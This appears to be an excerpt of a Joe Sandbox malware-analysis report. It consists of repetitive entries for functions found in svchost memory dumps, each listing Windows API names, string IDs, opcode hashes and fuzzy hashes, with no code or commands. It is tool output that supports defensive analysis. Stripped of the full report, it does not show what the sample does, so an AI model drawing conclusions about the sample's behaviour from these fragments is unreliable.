• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: fc1dd02edc12355f96b8c6091c764dbb9291bb19f66b11988602bc71c3f8f41e
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 845176BA108A40CAEB748F159C4439977E0F3D8B96F344115EA99ABBD6CF34C892DF01
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: ad45d22ad7a6753d79fe8c222c5ea2f5e9edbd916628ce97fb90c6b8838d5ca3
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 281163BA358F45D1EB109735EC403D972A4B7CC783FA04025EA59ABA96EF68CD17CB00
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000158709E269F), ref: 00000158709E27D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: 298409d3a7e361afb17375243e6bb2b44ea0b2f0bbf748d1a9b29aaa4d750813
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: 0691B03B610A50C5FB549B65DC407ED3BA0B39CB8AF64110ADE4A7B7A5CE35C856CB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 2d0ac19cec24b1b09804199140b85983ea6f3e7ef139a1f945529a88b555fd7e
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: DB71A13A248B85C6E775CF25DC443E977A1F3ED786FA44016DD496BB9ADE34C6028B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 38daa94b86bee1b1384bb35c4271310a79bbe3cd8cb2a03f7da892b01cc4fe68
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 0171D33A248F85C2E7349F26DD543EA7791F3DC786F650016DE096BB9ADE34C6028B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: f14f1dd50eec166e2868218d6e961808d20ad14834388aceb6526f4816ae642c
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: D051D47A319E10CAEB14CF15EC44BEDB791F388B9AF218120EA555B784DF79C846DB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: 0ed317e4bfe07071f596045d1d0a5e92573602493c84a80b975c9ec0ac44a7a6
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 55619FB6508BC4C5EB608B15E8403DAB7A0F7C9B99F144216EB992BB99DF7CC191CF00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: 47084f64c60144e124efa807debc3cd6c0f35b8b499574547f0504f75fa0d602
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: 5941B177625E84C6E760DF25E8047D9B7A4F38C785FA04125EA4D9B7A8EF38C812CB50
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 56241c786a7a0986ce0c760056f56ba35da91e0b9687e7c6e5b38bfe6fa9ad6d
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: F5111C36218F44D2EB618B15E84039AB7E5F78CB95F684224EA8D1B766DF38C952CB40
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: cadc8f88e6aa4b80ff665573fdb03b3ebaba0c016ef8fe6c3048e5e72e7373ce
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: AE115E26615F84D1EA04CB66A80839977B1F7CCFD1F684128DE4D6B765DF38D8928740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction ID: 9e016d719b4b5ff0071ca7194b1468e52874619d43008a696f2a0656b197155c
                                                                                                                                  • Opcode Fuzzy Hash: 11fcece52ee99c166653a5fed92b98cdda4cc5c9cd39da26b35572983ca8ad03
                                                                                                                                  • Instruction Fuzzy Hash: F1E0C9B6611A40D6E7049B62E81839977E1EB8CB56F558028C9490B360DF7DC8AA8B50
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1617791916-0
                                                                                                                                  • Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction ID: 0501a84959308c85bc78fa9a5fbec1c55ae6ecd01d602a2daa55f583ab097144
                                                                                                                                  • Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
                                                                                                                                  • Instruction Fuzzy Hash: 01E012B6611940D7E7089F62DC0839977E1FBCCF16F548024C9090B320DE3CC8AACB10